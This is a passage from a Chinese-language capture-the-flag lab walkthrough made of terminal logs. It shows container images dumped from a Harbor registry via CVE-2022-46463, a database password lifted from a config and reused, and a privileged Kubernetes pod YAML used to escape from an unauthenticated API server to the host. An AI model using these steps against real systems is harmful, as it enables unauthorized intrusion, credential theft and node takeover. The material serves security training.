[+] Downloading : 58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
/root/Desktop/ChunQiu/CloudNet/CVE-2022-46463/harbor.py:128: DeprecationWarning: Python 3.14 will, by default, filter extracted tar archives and reject files or modify their metadata. Use the filter argument to control this behavior.
tf.extractall(f"{CACHE_PATH}{dir}/{name}")
[+] Downloading : b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01
[+] Downloading : da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1
[+] Downloading : fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e
[+] Downloading : 413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
[+] Downloading : 8bd8c9755cbf83773a6a54eff25db438debc22d593699038341b939e73974653
┌──(root㉿kali)-[~/…/CVE-2022-46463/caches/harbor_secret/latest]
└─# cat /root/Desktop/ChunQiu/CloudNet/CVE-2022-46463/caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt
flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
6. flag05 172.22.10.28 DooTask
IP: 172.22.10.28
端口: 22, 服务: SSH
端口: 80, 服务: DooTask (开源项目管理工具)
端口: 3306, 服务: MySQL 数据库
漏洞: DooTask 管理系统,
6.1. mysql
从harbor仓库拉取project/projectadmin镜像
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# harbor.py http://172.22.14.46/ --dump project/projectadmin --v2
[+] Dumping : project/projectadmin:latest
[+] Downloading : 63e9bbe323274e77e58d77c6ab6802d247458f784222fbb07a2556d6ec74ee05
/usr/bin/harbor.py:128: DeprecationWarning: Python 3.14 will, by default, filter extracted tar archives and reject files or modify their metadata. Use the filter argument to control this behavior.
tf.extractall(f"{CACHE_PATH}{dir}/{name}")
[+] Downloading : a1ae0db7d6c6f577c8208ce5b780ad362ef36e69d068616ce9188ac1cc2f80c6
[+] Downloading : 70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd
[+] Downloading : ae0fa683fb6d89fd06e238876769e2c7897d86d7546a4877a2a4d2929ed56f2c
[+] Downloading : 90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c
┌──(root㉿kali)-[~/…/Greatwall/caches/project_projectadmin/latest]
└─# find ./ -name run.sh
./90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c/run.sh
./70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd/run.sh
┌──(root㉿kali)-[~/…/Greatwall/caches/project_projectadmin/latest]
└─# cat ./90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c/run.sh
#!/bin/bash
sleep 1
# start
>>>> java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null
┌──(root㉿kali)-[~/…/Greatwall/caches/project_projectadmin/latest]
└─# cat ./70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd/run.sh
#!/bin/bash
sleep 1
# start
>>>> java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null
解压后在里面可以获取到网站数据库密码
>>>> spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
>>>> spring.datasource.username=root
>>>> spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# mysql -h 172.22.10.28 -u root -pMy3q1i4oZkJm3 --skip-ssl
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 511
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> SHOW VARIABLES LIKE 'secure_file_priv';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.060 sec)
flag06: flag{413ac6ad-1d50-47cb-9cf3-17354b751741}
7. flag06 172.22.14.37
7.1. k8s API Server未授权
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# curl -k https://172.22.14.37:6443/api/v1 | jq '.resources[] | select(.name | in({"pods":1, "secrets":1, "configmaps":1, "nodes":1, "namespaces":1})) | {resource: .name, kind: .kind, verbs: .verbs}'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 10098 0 10098 0 0 59382 0 --:--:-- --:--:-- --:--:-- 59052
{
"resource": "configmaps",
"kind": "ConfigMap",
"verbs": [
"create",
"delete",
"deletecollection",
"get",
"list",
"patch",
"update",
"watch"
]
}
{
"resource": "namespaces",
"kind": "Namespace",
"verbs": [
"create",
"delete",
"get",
"list",
"patch",
"update",
"watch"
]
}
{
"resource": "nodes",
"kind": "Node",
"verbs": [
"create",
"delete",
"deletecollection",
"get",
"list",
"patch",
"update",
"watch"
]
}
{
"resource": "pods",
"kind": "Pod",
"verbs": [
"create",
"delete",
"deletecollection",
"get",
"list",
"patch",
"update",
"watch"
]
}
{
"resource": "secrets",
"kind": "Secret",
"verbs": [
"create",
"delete",
"deletecollection",
"get",
"list",
"patch",
"update",
"watch"
]
}
可以发现存在api server未授权访问
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -o jsonpath='{.items[*].spec.containers[*].image}'
Please enter Username: 1
Please enter Password: nginx nginx:1.8 k8s.gcr.io/pause:3.6
用nginx镜像创建一个恶意pod逃逸
#everything-allowed-exec-pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: everything-allowed-exec-pod
labels:
app: pentest
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: everything-allowed-pod
image: nginx:1.8
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f k8s.yaml
Please enter Username: 1
Please enter Password: pod/everything-allowed-exec-pod configured
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: 1
Please enter Password: NAME READY STATUS RESTARTS AGE
everything-allowed-exec-pod 1/1 Running 0 4m47s
进入容器,逃逸
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it everything-allowed-exec-pod -- /bin/bash
Please enter Username: 1
root@ubuntu-k8s:/#
root@ubuntu-k8s:/mnt# cd /host
root@ubuntu-k8s:/host# ls
bin dev home initrd.img.old lib64 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lost+found mnt proc run srv tmp var vmlinuz.old
root@ubuntu-k8s:/host# chroot /host
# netstat -lnpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 172.22.14.37:2379 0.0.0.0:* LISTEN 3108/etcd
tcp 0 0 127.0.0.1:2379 0.0.0.0:* LISTEN 3108/etcd
tcp 0 0 127.0.0.1:33675 0.0.0.0:* LISTEN 648/kubelet
tcp 0 0 172.22.14.37:2380 0.0.0.0:* LISTEN 3108/etcd
tcp 0 0 127.0.0.1:2381 0.0.0.0:* LISTEN 3108/etcd
tcp 0 0 127.0.0.1:10257 0.0.0.0:* LISTEN 3079/kube-controlle
tcp 0 0 127.0.0.1:10259 0.0.0.0:* LISTEN 3060/kube-scheduler
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 525/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 746/sshd
tcp 0 0 127.0.0.1:10248 0.0.0.0:* LISTEN 648/kubelet
tcp 0 0 127.0.0.1:10249 0.0.0.0:* LISTEN 3680/kube-proxy
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 937/mysqld
tcp6 0 0 :::10251 :::* LISTEN 3060/kube-scheduler
tcp6 0 0 :::6443 :::* LISTEN 3078/kube-apiserver
tcp6 0 0 :::10252 :::* LISTEN 3079/kube-controlle
tcp6 0 0 :::10256 :::* LISTEN 3680/kube-proxy
tcp6 0 0 :::10250 :::* LISTEN 648/kubelet
数据库中获取到最后一个flag
# mysql -uroot -p''
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.42-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| flaghaha |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use flaghaha;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+--------------------+
| Tables_in_flaghaha |
+--------------------+
| flag04 |
+--------------------+
1 row in set (0.00 sec)
mysql> select * from flag04;
+------+--------------------------------------------------------------+
| id | f1agggggishere |
+------+--------------------------------------------------------------+
| 1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |
+------+--------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> exit
Bye
# echo -n 'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==' |base64 -d
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}